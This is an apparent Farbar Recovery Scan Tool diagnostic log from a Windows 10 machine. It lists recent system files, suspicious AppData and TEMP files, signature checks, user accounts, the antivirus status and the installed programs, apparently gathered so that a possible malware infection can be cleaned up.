2016-03-09 10:30 - 2016-02-23 08:15 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-03-09 10:30 - 2016-02-23 07:59 - 00319488 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2016-03-09 10:30 - 2016-02-23 07:59 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-09 10:30 - 2016-02-23 07:57 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-09 10:30 - 2016-02-23 07:45 - 06788608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-09 10:30 - 2016-02-23 07:42 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-09 10:30 - 2016-02-23 07:42 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-09 10:30 - 2016-02-23 07:38 - 02663424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-09 10:30 - 2016-02-23 07:37 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetCfgNotifyObjectHost.exe
2016-03-09 10:30 - 2016-02-23 07:36 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-09 10:30 - 2016-02-23 07:25 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-09 10:30 - 2016-02-23 07:18 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-09 10:30 - 2016-02-23 07:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-03-09 10:30 - 2016-02-23 07:17 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-03-09 10:30 - 2016-02-23 07:14 - 00841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-03-09 10:30 - 2016-02-23 07:08 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-09 10:30 - 2016-02-23 07:04 - 00225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-09 10:30 - 2016-02-23 07:03 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-09 10:30 - 2016-02-23 07:03 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-09 10:30 - 2016-02-23 07:02 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-09 10:30 - 2016-02-23 06:55 - 14241792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-09 10:30 - 2016-02-23 06:51 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-09 10:30 - 2016-02-23 06:51 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-09 10:30 - 2016-02-23 06:48 - 05157376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 10:30 - 2016-02-23 06:46 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 01844736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-09 10:30 - 2016-02-23 06:45 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-09 10:30 - 2016-02-23 06:44 - 01821696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-09 10:30 - 2016-02-23 06:29 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-03-09 10:30 - 2016-02-23 06:17 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-09 10:30 - 2016-02-23 06:17 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-09 10:30 - 2016-02-23 06:11 - 12589056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-09 10:30 - 2016-02-23 06:03 - 01495040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-04-08 10:22 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-08 10:20 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 10:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-08 10:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-08 10:04 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-08 09:48 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-08 09:46 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-08 09:30 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-07 17:40 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-04-05 12:56 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-03-29 18:38 - 2013-12-17 08:09 - 00000000 ____D C:\ProgramData\Oracle
2016-03-29 18:37 - 2015-03-13 11:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-03-29 18:37 - 2010-10-17 17:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-29 18:33 - 2015-09-29 09:12 - 00000000 ____D C:\Users\RoNiN\.oracle_jre_usage
2016-03-29 18:32 - 2015-03-13 11:04 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-29 09:21 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-28 18:18 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-25 15:28 - 2015-07-30 17:50 - 00000000 ____D C:\WINDOWS\Setup
2016-03-25 14:59 - 2015-07-12 09:18 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707123-0500-0006-000700080009
2016-03-25 14:59 - 2015-07-12 09:17 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707069-0500-0006-000700080009
2016-03-24 00:32 - 2013-07-11 06:09 - 00000000 ____D C:\Users\RoNiN\Update
2016-03-23 23:06 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-22 23:42 - 2015-07-12 09:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436708320-0500-0006-000700080009
2016-03-22 20:01 - 2015-10-01 18:30 - 00003582 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 20:01 - 2015-10-01 18:30 - 00003518 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 18:59 - 2015-11-04 19:30 - 00000000 ____D C:\WINDOWS\Panther
2016-03-21 20:42 - 2015-09-27 14:51 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\foobar2000
2016-03-21 20:41 - 2015-09-27 14:49 - 03875496 _____ (foobar2000.org) C:\Users\RoNiN\Downloads\foobar2000_v1.3.8.exe
2016-03-14 22:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-03-14 19:01 - 2013-11-10 15:08 - 00000000 ____D C:\WINDOWS\pss
2016-03-13 19:51 - 2011-12-12 02:14 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-03-13 19:21 - 2015-02-14 12:26 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\TeamViewer
2016-03-13 19:21 - 2011-03-24 03:30 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Mozilla
2016-03-13 17:24 - 2015-07-30 18:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-13 14:00 - 2015-09-10 01:42 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\system32\NV
2016-03-11 19:12 - 2015-07-12 12:14 - 00000000 ____D C:\ProgramData\Package Cache
2016-03-10 23:34 - 2015-07-30 17:49 - 00342192 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-10 23:23 - 2010-10-24 03:29 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Azureus
2016-03-10 23:20 - 2010-11-03 00:18 - 00000000 ____D C:\Users\RoNiN\Documents\Vuze Downloads
2016-03-09 18:46 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-03-09 18:12 - 2013-09-15 20:36 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 17:36 - 2010-10-16 20:41 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
==================== Files in the root of some directories =======
2016-03-13 19:24 - 2016-03-13 19:47 - 6000640 _____ () C:\Program Files (x86)\GUTD8C6.tmp
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2015-02-21 16:19 - 0001385 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
2015-07-12 12:16 - 2015-07-12 12:22 - 0000112 _____ () C:\ProgramData\WceNM3o.dat
Files to move or delete:
====================
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat
C:\ProgramData\WceNM3o.dat
C:\Users\RoNiN\autoplaylist.dat
C:\Users\RoNiN\cddbcontrol.dll
C:\Users\RoNiN\cddblink.dll
C:\Users\RoNiN\cddbmusicid.dll
C:\Users\RoNiN\convert.exe
C:\Users\RoNiN\dbghelp.dll
C:\Users\RoNiN\dunzip32.dll
C:\Users\RoNiN\fixrjb.exe
C:\Users\RoNiN\hxaudiodevicehook.dll
C:\Users\RoNiN\ierjplug.dll
C:\Users\RoNiN\keys.dat
C:\Users\RoNiN\mc_enc_h263.dll
C:\Users\RoNiN\mediainfo.dll
C:\Users\RoNiN\mmcdda32.dll
C:\Users\RoNiN\rdsf3260.dll
C:\Users\RoNiN\realcleaner.exe
C:\Users\RoNiN\realconverter.exe
C:\Users\RoNiN\realjbox.exe
C:\Users\RoNiN\realplay.exe
C:\Users\RoNiN\realshare.exe
C:\Users\RoNiN\realtrimmer.exe
C:\Users\RoNiN\rjbres.dll
C:\Users\RoNiN\rjdlg.dll
C:\Users\RoNiN\rjprog.dll
C:\Users\RoNiN\rjwmapln.dll
C:\Users\RoNiN\rndevicedbbuilder.exe
C:\Users\RoNiN\rpau3260.dll
C:\Users\RoNiN\rphelperapp.exe
C:\Users\RoNiN\rpplugprot.dll
C:\Users\RoNiN\rpshell.dll
C:\Users\RoNiN\rpshellextension.dll
C:\Users\RoNiN\rpshellsearch.dll
C:\Users\RoNiN\rpwa3260.dll
C:\Users\RoNiN\strs23.dat
C:\Users\RoNiN\strs26.dat
C:\Users\RoNiN\tnetdtct.dll
C:\Users\RoNiN\tpasdk.dll
C:\Users\RoNiN\tsasdk.dll
C:\Users\RoNiN\wmdmhelper.dll
Some files in TEMP:
====================
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe
C:\Users\RoNiN\AppData\Local\Temp\io1.exe
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-04-08 10:02
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-08 10:30:23)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Emsisoft Anti-Malware (Enabled - Out of date) {15510D9D-6530-DA29-224F-7BA1BDD1CB58}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Emsisoft Anti-Malware (Enabled - Out of date) {AE30EC79-430A-D5A7-18FF-40D3C65681E5}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version: - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version: - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version: - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version: - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version: - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version: - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version: - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version: - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version: - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version: - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version: - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version: - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version: - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version: - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version: - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version: - )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version: - )
Chrome Remote Desktop Host (HKLM-x32\...\{EBFF2EA1-3944-4CA2-89FA-8B70C0058DD3}) (Version: 49.0.2623.40 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
Emsisoft Anti-Malware (HKLM\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 11.0 - Emsisoft Ltd.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version: - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version: - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version: - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
